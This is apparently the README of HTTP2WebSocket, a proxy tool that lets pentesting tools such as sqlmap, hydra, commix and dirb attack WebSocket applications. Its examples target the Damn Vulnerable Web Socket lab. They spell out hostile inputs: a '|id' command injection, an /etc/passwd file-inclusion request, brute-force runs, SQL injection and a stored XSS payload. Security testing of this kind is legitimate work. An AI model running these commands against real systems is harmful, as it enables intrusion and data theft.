Latest release: 1.0
License: GNU GPL
HTTP2WebSocket is tool to translate HTTP/1.1 traffic into Web Sockets traffic.
It can be used in conjunction with standard pentesting tools like sqlmap, dirb, commix or others.
It supports:
- SSL (wss://)
- Proxy
- WS connection initiation based on HTTP Host header
- request
- websocket-client
pip3 install request websocket-clientNo installation is required.
HTTP2WebSocket act as a proxy between HTTP and Web Socket connection. It expects HTTP incomming traffic and translates it to Web Socket application.
GET method is used to discover endpoinds.
POST method is used to sent data to a web socket application.
HTTP2WebSocket can work in two ways. The default one is passing the exact HTTP body to the web socket. The second one is passing only the value of the parameter provided.
HTTP2WebSocket can be binded to a specific application (-t parameter) or it can be provided in each HTTP request through Host header.
Examples are based on Damn Vulnerable Web Socket virtual machine.
Details on how to setup DVWS here: DVWS
Docker image of DVWS: DVWS docker image
Run the listener on port 3333 and connect to dvws.local:8080 web socket app on every HTTP request:
python3 HTTP2WebSocket.py -l 3333 -t ws://dvws.local:8080Brute force:
for i in 'abc' 'qwe' 'admin' 'asd' 'zxc'; do echo -n $i|base64; done > dict-passwords.b64
hydra -t 1 -L dict-passwords.b64 -P dict-passwords.b64 -s 3333 127.0.0.1 http-form-post /authenticate-user-prepared:'{"auth_user"\:"^USER^","auth_pass"\:"^PASS^"}':IncorrectCommand execution:
curl "http://127.0.0.1:3333/command-execution" -d '|id'File inclusion:
curl --data '/etc/passwd' 127.0.0.1:3333/file-inclusionError SQL injection:
sqlmap -u http://127.0.0.1:3333/authenticate-user --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --bannerBlind SQL injection:
sqlmap -u http://127.0.0.1:3333/authenticate-user-blind --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --bannerReflected XSS:
python2 xsssniper.py -u http://127.0.0.1:3333/reflected-xss --post --data="whatever"Stored XSS:
curl http://127.0.0.1:3333/post-comments --data '{"name":"zzz","comment":"<script>alert(1111)</script>"}'
curl http://127.0.0.1:3333/show-comments -X POSTDiscovering endpoints:
dirb http://127.0.0.1:3333/ endpoints-wordlist.txtOther stuff:
nikto -host http://127.0.0.1:3333/Run the listener on port 4444 and connect to dvws.local:8080 web socket app on every HTTP request.
It sends value of the HTTP POST body parameter fuzz. Some tools (E.g. commix) don't recognise plain body which is used by WS app.
python3 HTTP2WebSocket.py -l 4444 -t ws://dvws.local:8080 -P fuzzCommand execution:
python2 commix.py --url "http://127.0.0.1:4444/command-execution" --data "fuzz=127.0.0.1" --skip-empty --technique=C --hostnameFile inclusion :
python2 fimap.py -s -b --no-auto-detect -u "http://127.0.0.1:4444/file-inclusion" -P "fuzz=xxx"Run the listener on port 5555. Take Host header from each HTTP request and use it as a target WS application.
NOTE: Protocol type has to be provided in HTTP Host header (E.g. Host: wss://localhost:1234)
python3 HTTP2WebSocket.py -l 5555Brute force:
hydra -t 1 -L dict-passwords.b64 -P dict-passwords.b64 -s 5555 127.0.0.1 http-form-post /authenticate-user-prepared:'{"auth_user"\:"^USER^","auth_pass"\:"^PASS^"}':Incorrect:"H=Host: ws\://dvws.local\:8080"Command execution:
curl "http://127.0.0.1:5555/command-execution" -d '|id' -H 'Host: ws://dvws.local:8080'Discover endpoints:
dirb http://127.0.0.1:5555/ ~/endpoints-wordlist.txt -H Host:ws://dvws.local:8080Other:
nikto -host http://127.0.0.1:5555/ -vhost ws://dvws.local:8080Run the listener on port 6666. Take Host header from HTTP request and use it as a target WS application.
In this example actual data which is passed to the web socket application is the value of the fuzz parameter.
python3 HTTP2WebSocket.py -l 6666 -P fuzzCommand execution:
python2 commix.py --url "http://127.0.0.1:6666/command-execution" --data "fuzz=127.0.0.1" --skip-empty --technique=C --hostname --host="ws://dvws.local:8080"File inclusion:
curl --data '/etc/passwd' 127.0.0.1:6666/file-inclusion -H 'Host: ws://dvws.local:8080'Error SQL injection:
sqlmap -u http://127.0.0.1:6666/authenticate-user --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --banner --host="ws://dvws.local:8080"Blind SQL injection:
sqlmap -u http://127.0.0.1:6666/authenticate-user-blind --data '{"auth_user":"YWFhYWE=","auth_pass":"YWFh"}' --tamper=base64encode --banner --host=ws://dvws.local:8080Single example of all the options of HTTP2WebSocket:
In this example actual data which is passed to the web socket application is the value of the fuzz parameter.
python HTTP2WebSocket.py -l 7777 -t wss://dvws.local:8765 -P fuzz -v -k -p 127.0.0.1:8080| Parameter | Description |
|---|---|
| -l 7777 | Listen on port 7777/TCP |
| -t wss://dvws.local:8765 | Bind to dvws.local:8765 WS application through SSL |
| -P fuzz | Extract the value of the POST body parameter named fuzz and pass it to WS application |
| -v | Verbose mode |
| -k | Ignore SSL warnings and errors |
| -p 127.0.0.1:8080 | Send all traffic through jttp proxy: 127.0.0.1:8080 |
Sending simple request:
curl http://127.0.0.1:7777/authenticate-user -v -d 'fuzz=dawid'
React
Typescript
Django
Laravel
Facebook
Microsoft
Google
Alibaba
D3
Tencent